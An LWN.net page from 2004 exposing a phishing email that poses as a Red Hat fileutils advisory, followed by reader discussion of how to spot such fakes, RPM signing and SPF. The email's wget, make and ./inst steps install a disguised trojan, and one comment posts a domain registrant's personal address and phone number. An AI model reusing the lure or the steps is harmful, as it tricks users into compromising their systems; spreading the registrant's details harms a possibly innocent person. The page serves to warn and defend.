Weekly Edition
Return to the Security page| Weekly edition | Kernel | Security | Distributions | Search |
| Archives | Calendar | Subscribe | Write for LWN | LWN.net FAQ |
Fake Red Hat security update
| From: | RedHat Security Team <security-AT-redhat.com> | |
| To: | info-AT-eklektix.com | |
| Subject: | RedHat: Buffer Overflow in "ls" and "mkdir" | |
| Date: | Sun, 24 Oct 2004 17:06:50 -0500 |
Original issue date: October 20, 2004 Last revised: October 20, 2004 Source: RedHat A complete revision history is at the end of this file. Dear RedHat user, Redhat found a vulnerability in fileutils (ls and mkdir), that could allow a remote attacker to execute arbitrary code with root privileges. Some of the affected linux distributions include RedHat 7.2, RedHat 7.3, RedHat 8.0, RedHat 9.0, Fedora CORE 1, Fedora CORE 2 and not only. It is known that *BSD and Solaris platforms are NOT affected. The RedHat Security Team strongly advises you to immediately apply the fileutils-1.0.6 patch. This is a critical-critical update that you must make by following these steps: - First download the patch from the Security RedHat mirror: wget www.fedora-redhat.com/fileutils-1.0.6.patch.tar.gz - Untar the patch: tar zxvf fileutils-1.0.6.patch.tar.gz - cd fileutils-1.0.6.patch - make - ./inst Again, please apply this patch as soon as possible or you risk your system and others` to be compromised. Thank you for your prompt attention to this serious matter, RedHat Security Team Copyright © 2004 Red Hat, Inc. All rights reserved.
(Log in to post comments)
Fake Red Hat security update
Posted Oct 25, 2004 13:41 UTC (Mon) by haydentech (guest, #22504) [Link]
I swear, if any scammers ever bothered to learn correct English grammar or the art of spellchecking, we'd all be in trouble. Fortunately, they seem obstinately opposed to those ideas.
Fake Red Hat security update
Posted Oct 26, 2004 0:35 UTC (Tue) by Ross (subscriber, #4065) [Link]
Or learn how to companies write their own name, or bother to even make themessage remotely similar to real Red Hat advisories. If they were smart
they would have made the "update" an RPM. I see no reason not to and the
fact the patch was a tarfile with a Makefile and a script would be plenty
to tell it is fake by itself.
Fake Red Hat security update
Posted Oct 28, 2004 8:43 UTC (Thu) by lacostej (subscriber, #2760) [Link]
doesn't red hat sign their packages? If so a fake RPM would have been detected.
Fake Red Hat security update
Posted Oct 29, 2004 21:52 UTC (Fri) by giraffedata (subscriber, #1954) [Link]
They're not opposed, they just aren't very smart.It's fortunate for society that the Hollywood criminal mastermind is largely a myth. Most criminals are stupid; smart people have other avenues available to achieve their goals (good job, etc.).
Fake Red Hat security update
Posted Oct 25, 2004 13:53 UTC (Mon) by alex (subscriber, #1355) [Link]
Does the email contain an attachment or is the file hosted on the site? If its hosted on the site surely its an easy task to trace the domain owner and charge them?
Fake Red Hat security update
Posted Oct 25, 2004 13:55 UTC (Mon) by busterb (subscriber, #560) [Link]
Domain Name.......... fedora-redhat.comCreation Date........ 2004-10-24
Registration Date.... 2004-10-24
Expiry Date.......... 2005-10-24
Organisation Name.... Raymond Jackson
Organisation Address. 224 Cedar Avenue
Organisation Address.
Organisation Address. New York
Organisation Address. 95301
Organisation Address. NY
Organisation Address. UNITED STATES
Admin Name........... Raymond Jackson
Admin Address........ 224 Cedar Avenue
Admin Address........
Admin Address........ New York
Admin Address........ 95301
Admin Address........ NY
Admin Address........ UNITED STATES
Admin Email.......... rayjackson23@yahoo.com
Admin Phone.......... +1.2098994533
Admin Fax............
Tech Name............ YahooDomains TechContact
Tech Address......... 701 First Ave.
Tech Address.........
Tech Address......... Sunnyvale
Tech Address......... 94089
Tech Address......... CA
Tech Address......... UNITED STATES
Tech Email........... domain.tech@YAHOO-INC.COM
Tech Phone........... +1.6198813096
Tech Fax............. +1.6198813010
Name Server.......... yns1.yahoo.com
Name Server.......... yns2.yahoo.com
Fake Red Hat security update
Posted Oct 25, 2004 14:38 UTC (Mon) by pascal.martin (subscriber, #2995) [Link]
The ZIP code is for Atwater, CA not New York City, NY (NYC is 01xxx.. is anyone checking addresses at the registrars?). There is a 224 cedar Avenue there, through..
A Raymond Jackson lives there, according to the Yahoo phone book.
I suggest to be polite and not overflow the guy with phone calls: there is no proof he is not a victim as well..
It seems the site was taken down.
The script is SOOOOOO silly
Posted Oct 25, 2004 14:35 UTC (Mon) by jeld (guest, #22397) [Link]
These guys have no imagination. So, did anyone notify addlebrain.com that one of their boxen was rooted?
The script is SOOOOOO silly
Posted Oct 25, 2004 14:44 UTC (Mon) by pascal.martin (subscriber, #2995) [Link]
http://addlebrain.com was running Microsoft-IIS on Windows Server 2003 when last queried (Netcraft).
Not a root kit & no comment..
The script is SOOOOOO silly
Posted Oct 25, 2004 15:06 UTC (Mon) by jeld (guest, #22397) [Link]
Obviously it is not running IIS anymore, it runs some sort of apache. Here is the transcript:
HEAD / HTTP/1.0
HTTP/1.1 200 OK
Date: Mon, 25 Oct 2004 15:04:21 GMT
Server: Apache
Last-Modified: Mon, 10 May 2004 19:45:39 GMT
ETag: "35802a-373b-40f47ec0"
Accept-Ranges: bytes
Content-Length: 14139
Connection: close
Content-Type: text/html; charset=UTF-8
addlebrain.com
Posted Oct 26, 2004 1:57 UTC (Tue) by jtc (guest, #6246) [Link]
I missed where addlebrain.com fits into this, but I get the following results from HEAD:
$ HEAD addlebrain.com
200 OK
Cache-Control: private
Connection: close
Date: Tue, 26 Oct 2004 01:55:17 GMT
Server: Microsoft-IIS/6.0
Content-Type: text/html; charset=utf-8
Client-Date: Tue, 26 Oct 2004 01:51:12 GMT
Client-Response-Num: 1
Client-Transfer-Encoding: chunked
X-AspNet-Version: 1.1.4322
X-Powered-By: ASP.NET
addlebrain.com
Posted Oct 26, 2004 2:54 UTC (Tue) by jeld (guest, #22397) [Link]
Well... looks like you are right, except, that addlebrain.com (running IIS 6) is being redirected to www.addlebrain.com running apache. Since this is a valid site, and the email address where the script is sending cracked host info is root@addlebrain.com I figured that someone rooted one of addlebrain's boxes. Otherwise I don't know. addlebrain.com seems to belong to a company called ABM Wireless which sells cell phone accessories. MX record for addlebrain.com points to a server on everyone.net domain which is a mail hosting company. I cannot find much info about addlebrain.com IP address, but www.addlebrain.com address belongs to a dedicated web server/colocation company ThePlanet.com.
Fake Red Hat security update
Posted Oct 25, 2004 16:08 UTC (Mon) by JoeBuck (subscriber, #2330) [Link]
This shows that it was a very wise decision to add digital signatures to RPMs, and to have the rpm program verify those signatures before installation. If it were not for that, these guys could have packaged their trojan as an RPM, and with suitable trickery they might even have misled people into thinking they were getting the RPM off of a Red Hat site. But an RPM that is not signed with a key that is already loaded into the rpm database will not install.
Fake Red Hat security update
Posted Oct 25, 2004 16:51 UTC (Mon) by utidjian (subscriber, #444) [Link]
"But an RPM that is not signed with a key that is already loaded into the rpm database will not install."That is not quite true... at least not on any Red Hat or Fedora Core systems I have. It is true that 'yum update', 'apt-get update' and up2date will not, by default, install any unsigned or incorrectly signed packages. However, a simple 'rpm -ivh someunsignedpackage.rpm' will just go right ahead and install it. -DU-...etc...
Fake Red Hat security update
Posted Oct 25, 2004 16:42 UTC (Mon) by csm1975 (guest, #15864) [Link]
SPF would prevent this sort of email from being accepted by the victim. Red Hat *DOES* have proper SPF records in DNS.
;; ANSWER SECTION:
redhat.com. 600 IN TXT "v=spf1 mx a:hormel.redhat.com a:sources.redhat.com a:alertmail.redhat.com a:bltn.redhat.com ip4:65.125.54.185 ip4:65.125.54.186 ip4:65.125.54.187 ip4:65.125.54.188 ip4:65.125.54.189 ip4:65.125.54.190 ip4:219.120.63.242 -all"
So... if persons who received this email were to implement SPF on their end they would not get another one of these that "purported" to be from redhat.com.
http://spf.pobox.com for more information.
Fake Red Hat security update
Posted Oct 25, 2004 18:25 UTC (Mon) by admcd (subscriber, #5415) [Link]
Would SPF have prevented this?
What if the e-mail came from the fedora-redhat.com domain given in the e-mail? The owner of that fake domain could even have published SPF records for it, if they really wanted to.
Fake Red Hat security update
Posted Oct 25, 2004 19:45 UTC (Mon) by csm1975 (guest, #15864) [Link]
My SPF config would have...
If it had come from the fedora-whatever site it would not have but that wouldn't have been much of a phishing attempt would it?
Fake Red Hat security update
Posted Oct 26, 2004 7:35 UTC (Tue) by admcd (subscriber, #5415) [Link]
In which case you wouldn't have clicked on the www.fedora-redhat.com link. So SPF would have made no difference either way.
Fake Red Hat security update
Posted Nov 4, 2004 15:41 UTC (Thu) by job (subscriber, #670) [Link]
No, SPF would not have prevented that. The sender would have said "MAILFROM: myownsite.com", and "From: security@redhat.com" to you and you
would be none the wiser. How often do you read your mail transactions to
catch that suspicious looking line? Most people never have. Yet everyone
and their dog wants to have opinions about how mail transport done.
Learning how it works is much wiser, but few do.
Fake Red Hat security update
Posted Oct 25, 2004 18:52 UTC (Mon) by ccchips (guest, #3222) [Link]
I just re-read the "announcement" here.
wget?
I have a thought:
This person may be out to prove that Linux is no longer as secure as we'd like now that the average Joe can get 'hold of it, and now that it's becoming popular.
Myself, I would have cought this on a number of points:
- fedora-redhat.com is not a Red Hat site
- Bad english, as others have pointed out
- Security patch announcements from reputable companies don't come by e-mail, and if they do, the link is almost always to a site you can trust
- Security patches wouldn't be made available by "wget".
However, I am almost certain that some Windows users would have fallen for this, and I can't help but wonder if this clown was after newly-migrated Windows users.
Fake Red Hat security update
Posted Oct 26, 2004 9:06 UTC (Tue) by hppnq (guest, #14462) [Link]
I got one today that claimed to be Microsoft's. Same story, but it did look a lot more professional (working links to microsoft.com, graphics and all). I didn't have a chance to disassemble the attached update, it was removed by my ISP.Sigh.
Fake Red Hat security update
Posted Oct 28, 2004 3:02 UTC (Thu) by marduk (subscriber, #3831) [Link]
I dont' think they're out to "prove" anything regarding Linux. These are the same kinds of people who who send out the fake PayPal/Citibank registration emails. They're not trying to make a statement, just trying to screw over some poor soul. The only real difference is that these guys know how to use the command line...
Fake Red Hat security update
Posted Oct 28, 2004 16:26 UTC (Thu) by bod (subscriber, #17096) [Link]
> wget?
Nothing wrong with wget. Debian security advisories routinely include
instructions for using wget as one of the ways to fetch updated packages. See http://lists.debian.org/debian-security-announce/debian-s...
for a recent example.
Note however that DSAs are both signed and include MD5 sums for the updated
packages.
Fake Red Hat security update
Posted Oct 28, 2004 19:57 UTC (Thu) by Alan_Hicks (subscriber, #20469) [Link]
- Security patch announcements from reputable companies don't come by e-mail
You just called Slackware Inc. an irreputable company by inference. Granted, Slackware Inc. only sends security advisories out by the mailing list, so if you meant that they don't randomnly send out e-mails to users, you're correct.
Of course, those e-mails (as well as the packages) are digitally signed, meaning you can verify if it really did come from Slackware Inc. or not.
Fake Red Hat security update
Posted Oct 28, 2004 22:19 UTC (Thu) by BackSeat (subscriber, #1886) [Link]
> Security patch announcements from reputable companies don't come by e-mail
Most mainstream distributions have a security email list (SuSE, Gentoo, Debian, etc).
security patch announcements by email
Posted Oct 29, 2004 21:49 UTC (Fri) by giraffedata (subscriber, #1954) [Link]
A lot of people would says it's irresponsible of a company not to email its customers and tell them they need a security patch. I'm not a customer of any companies that distribute security patches, but I do occasionally get an email from my ISP urging me to get recent Windows updates.